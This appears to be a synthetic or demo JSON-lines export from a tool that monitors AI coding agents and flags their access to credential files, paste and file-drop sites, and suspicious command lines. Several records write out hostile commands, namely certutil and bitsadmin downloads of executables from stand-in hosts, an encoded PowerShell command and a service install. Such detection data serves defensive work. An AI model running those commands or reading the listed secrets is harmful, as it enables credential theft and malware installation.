{"session_id":"dev-laptop-bill-medium-1482719","agent":"cline","host":"dev-laptop-bill","session_first_seen":"2026-04-22T22:04:34Z","session_last_seen":"2026-04-22T22:05:45Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.aws\\config","reason":"aws credentials","op":"open","pid":5524,"image":"","event_ts":"2026-04-22T22:05:45.991767392Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"dev-laptop-bill-medium-1482719","agent":"cline","host":"dev-laptop-bill","session_first_seen":"2026-04-22T22:04:34Z","session_last_seen":"2026-04-22T22:05:45Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.aws\\config","reason":"aws credentials","op":"open","pid":5524,"image":"","event_ts":"2026-04-22T22:05:45.991767392Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"ml-workstation-high-119895444","agent":"kiro-cli","host":"ml-workstation","session_first_seen":"2026-04-22T20:14:54Z","session_last_seen":"2026-04-22T20:16:08Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.netrc","reason":"netrc","op":"open","pid":7102,"image":"","event_ts":"2026-04-22T20:16:04.570129063Z","reviewed_by":"","reviewed_at":"","severity":"high"}
{"session_id":"ml-workstation-high-119895444","agent":"kiro-cli","host":"ml-workstation","session_first_seen":"2026-04-22T20:14:54Z","session_last_seen":"2026-04-22T20:16:08Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.netrc","reason":"netrc","op":"open","pid":7102,"image":"","event_ts":"2026-04-22T20:16:04.570129063Z","reviewed_by":"","reviewed_at":"","severity":"high"}
{"session_id":"ml-workstation-high-119895444","agent":"kiro-cli","host":"ml-workstation","session_first_seen":"2026-04-22T20:14:54Z","session_last_seen":"2026-04-22T20:16:08Z","flag_type":"suspicious_cmdline","flag_detail":"certutil.exe -urlcache -split -f http://bad.example/x.exe C:\\Temp\\x.exe","reason":"certutil download","op":"","pid":4466,"image":"C:\\Windows\\System32\\wsl.exe","event_ts":"2026-04-22T20:16:08.570129063Z","reviewed_by":"","reviewed_at":"","severity":"high"}
{"session_id":"demo-critical-exfil","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T20:14:21Z","session_last_seen":"2026-04-22T20:14:41Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\ci\\.aws\\credentials","reason":"aws credentials","op":"open","pid":9900,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T20:14:25.406495887Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-critical-exfil","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T20:14:21Z","session_last_seen":"2026-04-22T20:14:41Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\ci\\.ssh\\id_rsa","reason":"ssh keys","op":"open","pid":9900,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T20:14:26.406495887Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-critical-exfil","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T20:14:21Z","session_last_seen":"2026-04-22T20:14:41Z","flag_type":"sensitive_host","flag_detail":"pastebin.com","reason":"paste site","op":"","pid":0,"image":"","event_ts":"","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-critical-exfil","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T20:14:21Z","session_last_seen":"2026-04-22T20:14:41Z","flag_type":"suspicious_cmdline","flag_detail":"powershell -EncodedCommand JABjACAAPQAgACIASABlAGwAbABvACIAOwAgACQAYwA=","reason":"powershell encoded command","op":"","pid":9101,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","event_ts":"2026-04-22T20:14:39.406495887Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-critical-exfil","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T20:14:21Z","session_last_seen":"2026-04-22T20:14:41Z","flag_type":"suspicious_cmdline","flag_detail":"sc.exe create SvcUpdater binPath= \"C:\\Users\\ci\\AppData\\Local\\Temp\\svc-updater.exe\" start= auto","reason":"service install","op":"","pid":9102,"image":"C:\\Windows\\System32\\sc.exe","event_ts":"2026-04-22T20:14:41.406495887Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"staging-ci-01-medium-498931042","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T17:31:40Z","session_last_seen":"2026-04-22T17:32:54Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.docker\\config.json","reason":"docker credentials","op":"open","pid":3347,"image":"","event_ts":"2026-04-22T17:32:54.481418645Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"staging-ci-01-medium-498931042","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T17:31:40Z","session_last_seen":"2026-04-22T17:32:54Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.docker\\config.json","reason":"docker credentials","op":"open","pid":3347,"image":"","event_ts":"2026-04-22T17:32:54.481418645Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"dev-laptop-bill-high-109290803","agent":"cline","host":"dev-laptop-bill","session_first_seen":"2026-04-22T17:19:55Z","session_last_seen":"2026-04-22T17:21:09Z","flag_type":"suspicious_cmdline","flag_detail":"cmd.exe /c bitsadmin /transfer job http://evil.example/payload.exe %TEMP%\\p.exe","reason":"bitsadmin transfer","op":"","pid":2044,"image":"C:\\Program Files\\Git\\usr\\bin\\bash.exe","event_ts":"2026-04-22T17:21:09.685563043Z","reviewed_by":"","reviewed_at":"","severity":"low"}
{"session_id":"staging-ci-01-critical-1068961348","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T17:15:39Z","session_last_seen":"2026-04-22T17:17:07Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.aws\\config","reason":"aws credentials","op":"open","pid":3490,"image":"","event_ts":"2026-04-22T17:17:03.66819715Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"staging-ci-01-critical-1068961348","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T17:15:39Z","session_last_seen":"2026-04-22T17:17:07Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.aws\\config","reason":"aws credentials","op":"open","pid":3490,"image":"","event_ts":"2026-04-22T17:17:03.66819715Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"staging-ci-01-critical-1068961348","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T17:15:39Z","session_last_seen":"2026-04-22T17:17:07Z","flag_type":"sensitive_host","flag_detail":"transfer.sh","reason":"anonymous file drop","op":"","pid":0,"image":"","event_ts":"","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.aws\\credentials","reason":"aws credentials","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:22.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.ssh\\id_rsa","reason":"ssh keys","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:23.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.ssh\\id_ed25519","reason":"ssh keys","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:24.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\work\\myapp\\.env","reason":"dotenv","op":"write","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:25.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\work\\myapp\\.env.production","reason":"dotenv","op":"write","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:26.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.kube\\config","reason":"kube config","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:27.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.docker\\config.json","reason":"docker credentials","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:28.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.npmrc","reason":"npm credentials","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:29.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.pypirc","reason":"pypi credentials","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:30.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"demo-sensitive-hits","agent":"claude-code","host":"ml-workstation","session_first_seen":"2026-04-22T17:14:21Z","session_last_seen":"2026-04-22T17:14:39Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.git-credentials","reason":"git credentials","op":"open","pid":9999,"image":"C:\\Users\\bill\\AppData\\Roaming\\Claude\\claude-code\\2.1.111\\claude.exe","event_ts":"2026-04-22T17:14:31.265696906Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"staging-ci-01-medium-241498762","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T16:27:28Z","session_last_seen":"2026-04-22T16:28:45Z","flag_type":"sensitive_path","flag_detail":"C:\\work\\myapp\\.env","reason":"dotenv","op":"open","pid":4996,"image":"","event_ts":"2026-04-22T16:28:43.792774405Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"staging-ci-01-medium-241498762","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T16:27:28Z","session_last_seen":"2026-04-22T16:28:45Z","flag_type":"sensitive_path","flag_detail":"C:\\work\\myapp\\.env","reason":"dotenv","op":"open","pid":4996,"image":"","event_ts":"2026-04-22T16:28:43.792774405Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"staging-ci-01-medium-241498762","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T16:27:28Z","session_last_seen":"2026-04-22T16:28:45Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.kube\\config","reason":"kube config","op":"open","pid":7919,"image":"","event_ts":"2026-04-22T16:28:45.792774405Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"staging-ci-01-medium-241498762","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-22T16:27:28Z","session_last_seen":"2026-04-22T16:28:45Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.kube\\config","reason":"kube config","op":"open","pid":7919,"image":"","event_ts":"2026-04-22T16:28:45.792774405Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"dev-laptop-bill-medium-359736192","agent":"claude-code","host":"dev-laptop-bill","session_first_seen":"2026-04-22T11:59:32Z","session_last_seen":"2026-04-22T12:00:47Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.netrc","reason":"netrc","op":"open","pid":3012,"image":"","event_ts":"2026-04-22T12:00:47.414646275Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"dev-laptop-bill-medium-359736192","agent":"claude-code","host":"dev-laptop-bill","session_first_seen":"2026-04-22T11:59:32Z","session_last_seen":"2026-04-22T12:00:47Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.netrc","reason":"netrc","op":"open","pid":3012,"image":"","event_ts":"2026-04-22T12:00:47.414646275Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"dev-laptop-bill-medium-359736192","agent":"claude-code","host":"dev-laptop-bill","session_first_seen":"2026-04-22T11:59:32Z","session_last_seen":"2026-04-22T12:00:47Z","flag_type":"sensitive_path","flag_detail":"C:\\work\\myapp\\.env","reason":"dotenv","op":"open","pid":4802,"image":"","event_ts":"2026-04-22T12:00:43.414646275Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"dev-laptop-bill-medium-359736192","agent":"claude-code","host":"dev-laptop-bill","session_first_seen":"2026-04-22T11:59:32Z","session_last_seen":"2026-04-22T12:00:47Z","flag_type":"sensitive_path","flag_detail":"C:\\work\\myapp\\.env","reason":"dotenv","op":"open","pid":4802,"image":"","event_ts":"2026-04-22T12:00:43.414646275Z","reviewed_by":"","reviewed_at":"","severity":"medium"}
{"session_id":"staging-ci-01-critical-59535636","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-20T23:44:16Z","session_last_seen":"2026-04-20T23:45:44Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.kube\\config","reason":"kube config","op":"open","pid":8158,"image":"","event_ts":"2026-04-20T23:45:40.591538552Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"staging-ci-01-critical-59535636","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-20T23:44:16Z","session_last_seen":"2026-04-20T23:45:44Z","flag_type":"sensitive_path","flag_detail":"C:\\Users\\bill\\.kube\\config","reason":"kube config","op":"open","pid":8158,"image":"","event_ts":"2026-04-20T23:45:40.591538552Z","reviewed_by":"","reviewed_at":"","severity":"critical"}
{"session_id":"staging-ci-01-critical-59535636","agent":"claude-code","host":"staging-ci-01","session_first_seen":"2026-04-20T23:44:16Z","session_last_seen":"2026-04-20T23:45:44Z","flag_type":"sensitive_host","flag_detail":"anonfiles.com","reason":"anonymous file drop","op":"","pid":0,"image":"","event_ts":"","reviewed_by":"","reviewed_at":"","severity":"critical"}